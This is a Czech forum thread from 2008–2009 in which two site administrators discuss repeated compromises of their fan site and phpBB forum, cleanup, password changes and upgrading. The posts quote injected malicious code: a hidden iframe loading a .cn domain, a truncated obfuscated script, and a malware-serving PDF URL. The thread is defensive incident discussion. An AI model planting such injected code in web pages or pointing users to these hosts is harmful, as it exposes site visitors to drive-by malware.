Právě je 21 říj 2018, 23:27




Odeslat nové téma Odpovědět na téma  [ Příspěvků: 23 ]  Přejít na stránku 1, 2  Další
Hacknutí fóra 
Autor Zpráva
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Hacknutí fóra
Tak nám někdo hacknul tohle fórum (naštěstí bylo nefunkční jen 7 hodin). Původně jsem myslel, že to je chyba někde v hostingu, že zase něco nastavovali, ale jak jsem se přesvědčil, tak někdo podstrčil do indexových stránek kód, který ale naštěstí nikoho nikam nepřesměroval. Bylo to samozřejmě na nějaké čínské stránky. Zdá se, že je někde chyba. Asi to bude chtít nejnovější verzi pokud vůbec existuje. Všechny ty "nakažené" soubory jsem sice přepsal, ale jen ty indexový.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


25 říj 2008, 14:28
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Co záloha od Banánu? ... to je asi na dlouhé lokty co... ale myslím, že těžko říct, jestli je to slabinou ve fóru nebo k tomu došlo díky bordelu u Banánu.


26 říj 2008, 22:54
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Podle mě za to může fórum. Ve složce, ve které jsou databáze byla spousta souborů, které se nějak vygenerovaly a určitě to ovlivnili. Otázka je, jak se podařilo přepsat desítky indexových stránek v tolika složkách. Ale to je jedno, naštěstí ten kód tam byl špatně o jedno jediné místo vlevo (zasazen do jiného kódu), takže to nefungovalo.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


27 říj 2008, 10:55
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Stejně, kde máš tu jistotu, že není nějaá ďoura u Banánu, která to umožnila?

Jinak, ono to s tím sice asi nesouvisí, ale zkouším teď Google Chrome a při návštěvě úvodní stránky na webu (ne na fóru ale přímo na webu) mi to občas zároveň v nové záložce otevře http://golpii.com/25/1/getfile.php?f=vispdf odkud se otevírá nějaké pdf, načež mi program pro pdf zahlásí, že soubor je poškozen a nelze ho opravit.


07 lis 2008, 02:07
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Takže to je asi na více místech. Budu se na to muset kouknout. To naštve. Tohle se mi taky stalo. Tady na fóru myslím.
Asi by to mohlo být fakt na banánu.

EDIT:// Předtím jsem si toho nevšiml. Celý web je tím prolezlý. To bude zase hromada práce to všechno vyčistit. Chyba musí být opravdu u Banánu. Postihlo to jen všechny indexové stránky. Tady je ta sračka, která je vždy na úplném konci za ukončovacím tagem html.
<iframe src="http://thefilmmusic.cn/in" width=1 height=1 style="visibility: hidden"></iframe>

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


07 lis 2008, 02:32
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
K tomu co jsem zmiňoval... koukej:
http://forum.joomla.org/viewtopic.php?f=432&p=1453876
... a tady je info na tom Nortonu, jak píše v tom postu http://safeweb.norton.com/report/show?url=golpii.com


07 lis 2008, 04:30
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Celý web je už čistý. Zasáhlo to jen všechny indexy, takže asi hodina práce. Ale co mě štve je to, že jsem si toho nevšiml dříve. Je tu totiž problém. Každý, kdo přijde na web přes Firefox v nové verzi a má nastavenou ochranu, tak mu bude odepřes přístup, protože Google ten web hlásí jako podezřelou útočnou stránku. Takže se musíš úplně všude proklikat. Prostě je to hrůza. I každá fotka se musí odkliknout. Nic se ti nezobrazí. A spousta lidí si ani nevšimne toho malého odkazu, že se to má ignorovat, takže se na web vůbec nedostanou. No, to je ztráta tak 30% návštěvníků.

To by mě zajímalo, jestli v té databázi podezřelích stránek bude web pořád nebo jen dočasně. Už mě to fakt štve.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


07 lis 2008, 12:39
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Tak to co dělá FF po navštívení webu přes Google, to je teda pakárna. Nepoužívám ho, spustil jsem to teď kvůli tomu, takže všimnout jsem si předtím nemohl. Ale jestli jsi postřehnul, začne na to upozorňovat až tehdy, když na web příjdeš přes Google, který to má v té databázi jak říkáš. Když jsem na web přistupoval normálně zadáním adresy, tak to neupozornilo naprosto na nic. Právě až jsem teď jednou zkusil vlézt přes ten Google tak už FF řve vždy (i když zadávám přímo adresu a nepomáhá ani vymazání cache což mě, vzhledem k výše uvedeným souvislostem kdy FF reaguje až po návštěvě přes Google, zaráží). Běžně používám Operu a ta mi nehlásila nic (je možné, že to tady mám deaktivované protože takové věci vypínám - jenom to otravuje, hlásí to kde co). Jak jsem ale psal, že jsem zkoušel teď ten Google Chrome ... připomněl si mi, že on to jako podezřelou stránku před pár dny nahlásil taky (a to sám od sebe, ne jak FF až po návštěvě Google) ale jen jednou. Osobně jsem tomu nevěnoval pozornost, je to beta verze a po zkušenostech jak tohle ověřování "funguje" mi to ani nerozblikalo v hlavě žádnou kontrolku (tady je ale dost dobře možné, že si Chrome nějak "povídá" s Google samo o sobě a nepotřebuje nakopnutí jak FF). Ta infiltrace je tu od kdy? Od toho 25.10. jak si založil tohle vlákno ne? Tak to zas není tak dlouho a podle infa na Google web "kontrolovali" naposledy 6.11. takže je šance, že to zase brzy zkusí. Každopádně, proč ten FF pořád řve? ... on sám o sobě by podle mě žádnou databázi mít neměl, on kontroluje každou stránku zvlášť, což by znamenalo, že to stále není čisté tak jak si myslíš - na druhou stranu, proč si toho ale všimnul až po přístupu přes Google? A kdyby to nějak souviselo s napojením na databázi Googlu, proč pak teda nepomohlo vymazání cache? ... zatím mi to není tak docela jasné.

p.s. kdyby sis nevšiml, máš PM ohledně aktivace uživatele


08 lis 2008, 02:06
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Pokud si dobře vzpomínám, tak tohle není přímo jen přes Google, ale je to už implementovaná ochrana přímo ve FF, který přebírá ty informace z Google. Asi si to před každou návštěvou ověřuje. A bohužel toho 6.11. to byla poslední kapka a doufám, že nebude trvat 90 dní než se to odblokuje.

Pokud některou stránku odblokuješ, tak už se ti přestane zobrazovat ta výstraha, ale ostatní stránky jsou stále bloklé a musejí se odblokovat ručně. To ale asi nikdo z návštěvníků dělat nebude.

Zkusil jsem to co bylo dole napsáno, ty jejich nástroje, tak snad to vyřadí z té databáze a vše zase půjde jak má. Ale tohle je novinka třetí verze FF, která lidem pomůže se vyhnout "nebezpečí". Bohužel ale občas na to lidi doplatí. Naštěstí už je to ale všechno smazané.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


08 lis 2008, 13:10
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Tak už od středy tam je ta výstraha. Dokonce mi poslali i mail. Posílají to každému, kdo má napadený web, ale bohužel jsem ho objevil až dneska. Už jsem požádal i o kontrolu, která zjistí, že všechno je v pořádku a odstraní to varování.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


08 lis 2008, 19:49
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Tak jsou celkem rychlí :) už je to pryč


09 lis 2008, 21:29
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Tak je tu znovu útok na web. Tentokrát to nejvíce odskákali weby. Forum bylo také zamořeno. Už mě to štve. Forum už je čisté, ale JA web je plný nějakého svinstva, které ani nemůžu stáhnout, protože antivir to ihned likviduje a vypínat ho nechci, protože nechci nic chytnout.
S tím čistěním webu, to bude hodně práce. Bohužel některé věci asi budou přepsány, ale nové verze indexových stránek nemám, takže ... zase hledání na Google.
Nechápu jak se to mohlo na ten web dostat. To zabezpečení je děsivý.

EDIT:// Všechno je už čistý, ale už mě to fakt pořádně sere. Ti parchanti snad nemají nic lepšího na práci než lidem znepříjemňovat život.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


11 úno 2009, 15:21
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Mám obavu, že je to tu teď od půl deváté večer zase, otevírá mi to sem tam nějaké pdfko a na konci různých indexů je script. Poslední dny jsem tu nebýval, moc povinností, tak ani nevím co se konkrétně dělo.

//EDIT: snad jsem to vyčistil .. jedná se o tohle na konci index souborů:

Kód:
<script>function c271f17f2ch4993270aa27b7(h4993270aa2fb6){  return (parseInt(...


... všiml jsem si, že to napadá jen indexy do první úrovně adresáře, dále už to nebylo. Platí to ale jen pro adr. www, u dalších, čili dark-angel a forum to postihuje čistě ten kořenový adresář. ..každopádně je třeba s tím něco udělat, je jasné, že se to bude opakovat.


11 úno 2009, 22:12
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Tohle je ta sračka, která tu je jakse zdá už dnes podruhé. Nechápu jak je to možný. To musí být nějaká chyba někde v nastavení u banánu jinak si to nedovedu vysvětlit. Uvidíme, jestli to tu bude i zítra nebo ne. Ale už mě to extrémně štve.
Tentokrát je to už jiné než poprvé před týdny. Teď je tu tenhle nechutně dlouhý kód. Dříve to aspoň byl jen krátký odkaz omylem zmršený. Jinak můj antivir mě na web vůbec nepustil, takže netuším co to všechno mohlo lidem způsobovat. Vypnul jsem ho jen na vyčistění souborů, ale bez antiviru bych to rozhodně nezkoušel zobrazovat.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


11 úno 2009, 23:07
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Na dnešní cirkus-antiviry a různé one click blbiny mám svůj názor a nechci to rozmazávat, protože bychom se asi neshodli, ale každopádně jsem teda jeden nainstaloval na druhém kompu ze srandy .. a nic mi to nehlásí, ale nevím o máš. Podle mě z toho nemáš co chytit, to je jen ta tvoje věc, ehm antivir, háklivá na nějaký kus kódu co v tom scriptu je.

Počkáme, uvidí se ... pak to bude ale třeba asi nějak řešit s banánem ... nahlásit jim o co jde.


11 úno 2009, 23:30
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Už mě to fakt nebaví. V noci zase další útok a zase je všechno zamořený. Já se na to vykašlu. Pokud se to bude opakovat, tak web prostě v dubnu končí. Na tohle nemám čas ani náladu.

A jinak bez antiviru bych ani nezjistil, že tam něco takového vůbec je. Ale z dřívejších zkušeností můžu říct, že antivir je jedna ze základních věcí na počítači (a další je firewall, bez toho se dříve nedalo ani připojit na internet, když tu byly ještě Win XP a ten sráč už nevím jak se jmenuje, co neustále restartoval počítač).

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


12 úno 2009, 15:08
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Po čtvrté to tady bylo zase. Změň nám oběma hesla na FTP (a vůbec ke všem účtům co souvisí s webem) .. a dej tam nějaké jiné, ale fakt hesla ne to co tam je teď, takže nejlíp náhodná změť znaků a čísel. Npiš mi obratem jaké mám .. hlavně na to FTP.

Jinak než by měl web teď skončit, tak to raději po tobě třeba komplet převezmu a zkusím se s tím nějak poprat, jestli to takhle chceš vzdát. Každopádně je třeba to začít řešit s banánem, nevím jestli jsi už něco psal ... chctěl jsem kontaktovat toho svého kamaráda tam ale zatím není k zastižení. Nechceš tuhle konverzaci přenést na PM nebo mail? Tohle tu stejně nikoho nezajímá.

//EDIT: už jsem mluvil s tím kámošem, taky zmínil ty hesla a ještě ať se zkusíme připojovat na ftp přes ssl ... změň hesla i k databázi ... kdyby to nepomohlo uvidíme co dál

//EDIT: změň pls ty hesla ... už to tu bylo zase - 22:07 ... jinak když to nepomůže, ale i tak, nebylo by od věci updatnout fórum na verzi 3.0.4 (tady je 3.0.0) ...může se to šířit i přes to .. třeba nějakým sql injection, chyba ve scriptu prostě, neošetřené vstupy, co já vím.


12 úno 2009, 18:04
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Jdu změnit ty hesla. Pak ti ho pošlu do PM. Ale myslím, že se tím nic nevyřeší.

EDIT: Vše změněno. To jsem zvědav, jestli zase kolem třetí tu bude další útok. Zdá se, že když tam ten kód už jednou je, tak další útok už není dokud se to znovu nesmaže.

A pokud chceš dát novou verzi tak do toho. Ale bude se to muset asi celé smazat, protože z minulého útoku před týdny tam je napůl nová a napůl stará verze. Včera jsem se přesvědčil, že nejnovější je nekompatibilní se starší, když se změní jen některé soubory. A protože tam jsou dvě verze, tak úplné přespání novou je asi nevyhnutelné (nevím, jestli jen ten update co PHPBB nabízí bude stačit).

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


13 úno 2009, 00:12
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 16 pro 2006, 02:46
Příspěvky: 658
Bydliště: Ostrava
Příspěvek Re: Hacknutí fóra
Díky, heslo jede OK .... taky do změny hesel nevkládám moc naději ale zkusit je to třeba. A hlavně se tam zkus připojovat přes to SSL (jestli máš TC tak umějí to až novější verze a možná bude třeba zapnout pasivní mód).

Nechápu moc jak to myslíš, že je tam napůl nová a napůl stará verze fóra... ale každopádně já teď nemám čas, pak se něco vysere a budu se s tím bavit celý den.... ty to taky můžeš udělat ne? ... osobně se do toho teď nepouštím, ale bylo by to dobré ... bůh ví přes co to tu leze. Mě napadla i ta moje galerie, jenže jak se to tu objevilo úplně poprvé, tak tu ještě nebyla a navíc to ani nedělá s databází ... s tou dělá kromě fóra ještě anketa.

//EDIT: sem si všiml, že tou změnou hesel se samozřejmě znefunkčnila anketa, už jsem i do jejího konfiguráku zadal to nové heslo k databázi


13 úno 2009, 02:25
Profil
Člen fanclubu
Člen fanclubu
Uživatelský avatar

Registrován: 19 črc 2006, 04:16
Příspěvky: 635
Příspěvek Re: Hacknutí fóra
Udělat to samozřejmě můžu. Raději tam ale nakopíruju celou novou verzi toho fóra, protože tam je verze 3.0 a asi 3.0.3 a když tam dáš něco z poslední 3.0.4, tak to nejede s těma předchozíma. Aspoň u indexu ne. Je tam pár řádků navíc, které ve starších verzích nejsou.
Abych řekl pravdu, tak to FTP je z mé strany v pohodě, protože já se připojoval jen když jsem něco měnil, tedy jednou za pár měsíců. Od prvního do posledního asi 2x, takže u mě to nebezpečí nevzniklo.
Stejně to je určitě nějaký útok z Číny jako předtím. Ale nechápu proč na web, který má tak malou návštěvnost.

No, dneska se na to podívám a uvidíme, jestli se to povede. Pokud ne, tak mám už i zálohu fóra, pro případ, že se něco podělá. Ale fórum taky určitě není zdroj těch problémů. I kdyby se dostali k heslu sem, tak to nemá vůbec žádnou souvislost s ničím jiným na tomto webu. Kdybych nebyl línej a rozuměl těmhle divným věcem, tak bych si zjistil jak je to možný, že tu jsou tyhle útoky. Ale asi to taky zkusím. Někde určitě bude napsáno jak to dělají.

_________________
Veritas vos liberabit
Pravda je relativní. Jde o to kdo jí říká.


13 úno 2009, 02:52
Profil
Zobrazit příspěvky za předchozí:  Seřadit podle  
Odeslat nové téma Odpovědět na téma  [ Příspěvků: 23 ]  Přejít na stránku 1, 2  Další


Kdo je online

Uživatelé procházející toto fórum: Žádní registrovaní uživatelé a 1 návštěvník


Nemůžete zakládat nová témata v tomto fóru
Nemůžete odpovídat v tomto fóru
Nemůžete upravovat své příspěvky v tomto fóru
Nemůžete mazat své příspěvky v tomto fóru
Nemůžete přikládat soubory v tomto fóru

Hledat:
Přejít na:  
cron
Powered by phpBB © phpBB Group.
Designed by Vjacheslav Trushkin for Free Forums/DivisionCore.
Český překlad – phpBB.cz